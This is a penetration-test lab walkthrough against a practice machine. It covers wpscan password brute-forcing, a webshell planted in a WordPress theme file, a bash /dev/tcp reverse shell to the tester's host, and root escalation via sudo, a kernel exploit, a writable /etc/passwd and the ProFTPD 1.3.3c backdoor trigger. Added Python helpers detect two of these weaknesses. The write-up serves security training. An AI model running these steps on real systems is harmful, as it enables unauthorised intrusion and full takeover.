Penetration test practice: target machine 3wp

0x00 Introduction

Target IP: xxxx.95

Test IP: xxxx.96

Test environment: win10, kali, etc.

Test time: 2021.7.23-2021.7.26

Tester: ruanruan

0x01 Information Collection

1. Port scanning

  • 21, ftp, ProFTPD 1.3.3c
  • 22, ssh, OpenSSH 7.2
  • 80, web

2. Directory scanning

Directory scanning with Edgeworth found the /secret/ directory.

Visiting it shows a WordPress blog.

0x02 First attempt

1. Port 21, ftp
  • Anonymous login: failed
  • Weak passwords: failed
2. Port 22, ssh

Recent version, not attempted for now.

3. Port 80, WordPress
  • Tried to get a shell from the admin backend by writing a one-line webshell into the post submission page, but failed.
  • Looked up vulnerabilities for WordPress 4.9; most of them do not give a shell.
  • wpscan scanned plugins, themes, usernames and other vulnerabilities and found nothing.

Use wpscan to enumerate usernames first, then brute-force the password; this gives admin/admin.

wpscan --url xxxx.95/secret -e u

wpscan --url xxxx.95/secret/ -U admin -P rockyou.txt

Log in through the default WordPress admin backend.

0x03 getshell

Common ways to get a shell from the WordPress backend are:

  • Online editing
  • Uploading files
    • media files
    • theme files
    • plugins (a plugin that contains a webshell, not a vulnerable plugin)

Here it is done through the online editing page.

First click the theme, select the editor, edit the 404 page and write in a one-line webshell.

Full page link: http://xxxx.95/secret/wp-content/themes/twentyseventeen/404.php

Then connect with Chopper to get a shell.

0x04 Obtaining a higher-privileged user

1. Collect information

Check id: currently www-data

Check which ports are open

netstat -ano

View the database configuration

Check the home directory; marlinspike is presumably a username

Entering the marlinspike directory, there are two hint messages: sudo privilege escalation, and a proftpd backdoor?

Check /etc/passwd to confirm that the user exists

The Chopper webshell is awkward to use, so redirect a shell to Kali.

bash -c 'bash -i >&/dev/tcp/xxxx.96/2333' 0>&1

2. Using the information

Guess the account password is marlinspike/marlinspike and log in via ssh.

Then continue to collect information and try to escalate privileges.

0x05 Privilege Escalation

1. Information collection and attempts
  • Common privilege escalation checks in Linux:
    • sudo: sudo -l
    • suid
      • find / -type f -perm -u=s 2>/dev/null -ls
    • crontab
      • ls -l /etc | grep cron
      • ls -al on the cron directories to see whether any script is run with root permissions
    • nfs
      • showmount -e ip
    • kernel
      • uname -a
      • searchsploit
  • MySQL privilege escalation was tried, but the mysql service runs as the mysql user, so escalating through it only yields the mysql account
  • ftp also does not run as root; escalating through it would only yield the ftp user, not root.
2. Sudo privilege escalation

sudo -l lists the commands that may be run with root privileges.

It shows ALL, so simply sudo su.

3. Kernel privilege escalation

uname -a

searchsploit ubuntu 4.10.0

View the exploit details and get its path

searchsploit -p 45010.c

Log in with sftp and upload the exploit

sftp marlinspike@xxxx.95
put 45010.c

Compile the .c file and execute it

gcc 45010.c -o exp
ls -l exp
./exp
/bin/bash

4. A low-privileged user can modify the root password directly

The marlinspike account has write permission on /etc/passwd.

ls -al /etc/passwd

The x in root's password field can be replaced directly with a new password hash.
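As an added example (not from the original writeup), the Python check below audits the /etc/passwd weakness this section relies on, and the file-permission point from the enumeration checklist above: whether the file is writable by group or others or not owned by root, and whether any entry carries a hash or an empty password instead of the 'x' placeholder. The sample passwd content is constructed and the /etc/passwd default path is an assumption.

```python
"""Added audit example (not from the original writeup): flag an /etc/passwd a
non-root user can write, and entries keeping a hash or empty password in
passwd instead of the 'x' placeholder that points to /etc/shadow."""
import os
import stat

LOCKED_MARKERS = ("x", "*", "!", "!!")

def mode_findings(mode, uid):
    """Findings for a stat mode/uid pair; /etc/passwd should be 0644 and root-owned."""
    found = []
    if mode & stat.S_IWGRP:
        found.append("group-writable")
    if mode & stat.S_IWOTH:
        found.append("world-writable")
    if uid != 0:
        found.append("owned by uid %d, not root" % uid)
    return found

def entry_findings(text):
    """Findings for passwd-format text: stray hashes, empty passwords, extra UID 0."""
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            found.append((lineno, "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            found.append((lineno, "%s: empty password (login without password)" % name))
        elif pw not in LOCKED_MARKERS and not pw.startswith("!"):
            found.append((lineno, "%s: hash stored in passwd instead of shadow" % name))
        if uid == "0" and name != "root":
            found.append((lineno, "%s: second UID 0 account" % name))
    return found

def audit_passwd(path="/etc/passwd"):
    """Run both checks against a real file; the path is an assumed default."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return {"mode": mode_findings(st.st_mode, st.st_uid), "entries": entry_findings(text)}

# Constructed sample: root's 'x' replaced by a fake hash, as the writeup describes
SAMPLE_PASSWD = (
    "root:$6$constructed$NOTAREALHASH:0:0:root:/root:/bin/bash\n"
    "marlinspike:x:1000:1000:,,,:/home/marlinspike:/bin/bash\n"
)
```

Running audit_passwd() on a host returns an empty findings list for a correctly permissioned file; any entry in the "mode" list is the condition this section exploited.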

5. Use the ProFTPD 1.3.3c backdoor vulnerability to escalate privileges

The earlier hint message pointed at a backdoor, but search was not used well.

Search: proftpd 1.3.3c backdoor

Reference: https://blog.csdn.net/weixin_34384681/article/details/89798540

Key vulnerability code:

if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
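As an added example (not from the original writeup or the ProFTPD project), these Python helpers give a defender three checks for this backdoor: whether a service banner reports the affected 1.3.3c version, whether a client command in a captured session transcript carries the marker string compared by the strcmp above, and whether an installed binary contains that marker at all. The transcript layout and the sample session are constructed.

```python
"""Added detection example (not from the original writeup or the ProFTPD
project) for the ProFTPD 1.3.3c backdoor: affected-version banner check,
marker search in a session transcript, and marker search in a binary."""
import re

AFFECTED_VERSION = "1.3.3c"
MARKER = "ACIDBITCHEZ"  # literal compared by the backdoor's strcmp (quoted above)
BANNER_RE = re.compile(r"ProFTPD\s+(\d+\.\d+\.\d+[a-z]?)")

def banner_version(banner):
    """Version string from an FTP greeting line, or None if it is not ProFTPD."""
    m = BANNER_RE.search(banner)
    return m.group(1) if m else None

def banner_is_affected(banner):
    """True only for the tampered 1.3.3c release named in the writeup."""
    return banner_version(banner) == AFFECTED_VERSION

def trigger_hits(transcript):
    """(line number, command) for client lines carrying the marker.

    Transcript layout is constructed for this example: 'C> ' prefixes client
    commands and 'S> ' server replies. Matching is case-insensitive so a
    command log that lowercases input still trips the check."""
    hits = []
    for n, line in enumerate(transcript.splitlines(), 1):
        if line.startswith("C> ") and MARKER in line.upper():
            hits.append((n, line[3:].strip()))
    return hits

def binary_has_marker(path):
    """True if the file contains the marker bytes; a clean build does not."""
    with open(path, "rb") as fh:
        return MARKER.encode() in fh.read()

# Constructed session: banner from the affected version, then a client line
# carrying the marker (the check flags it on any client command).
SAMPLE_TRANSCRIPT = (
    "S> 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [xxxx.95]\n"
    "C> USER anonymous\n"
    "S> 331 Anonymous login ok, send your complete email address as your password\n"
    "C> ACIDBITCHEZ\n"
)
```

A banner match alone only says the version is the affected one; binary_has_marker on the installed proftpd executable confirms whether that particular build actually carries the backdoor.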

0x06 Summary

1. Problems encountered
  • WordPress backend getshell: the online-editing attempt went to the wrong place
    • If you are not familiar with the common getshell methods in the WordPress backend, try them all.
  • Redirecting the shell from Chopper to Kali failed, showing a /bin/sh syntax error
    • The webshell is not a full interactive shell; this can be solved with bash -c 'xxx'
  • When looking for the marlinspike password, I did not try the username itself directly.
    • After trying to obtain it by collecting other information: when you meet an unknown password, try the username first, then methods such as information collection and brute-forcing.
  • Didn’t notice that /etc/passwd can be modified directly
    • For files such as /etc/passwd, /etc/shadow and .sh scripts, pay attention to the current user's write and execute permissions on them.
  • Did not find the privilege escalation method for the proftpd backdoor vulnerability
    • Didn’t know about the vulnerability, but also didn’t use search well. Think more about, and search for, the usefulness of each piece of information.
2. Knowledge points
  • Summary of WordPress backend getshell methods
  • ProFTPD backdoor privilege escalation vulnerability
  • Privilege escalation approach
    • Get the password directly
    • Privilege escalation via services running with root privileges
3. Reflection
  • What went better
    • Thinking was clearer
    • The collected information was better integrated and analyzed
    • More proficient at privilege escalation in Linux
  • Where to keep working hard
    • Understanding the scope of vulnerabilities in common services and CMSes
    • Thinking about and making use of key information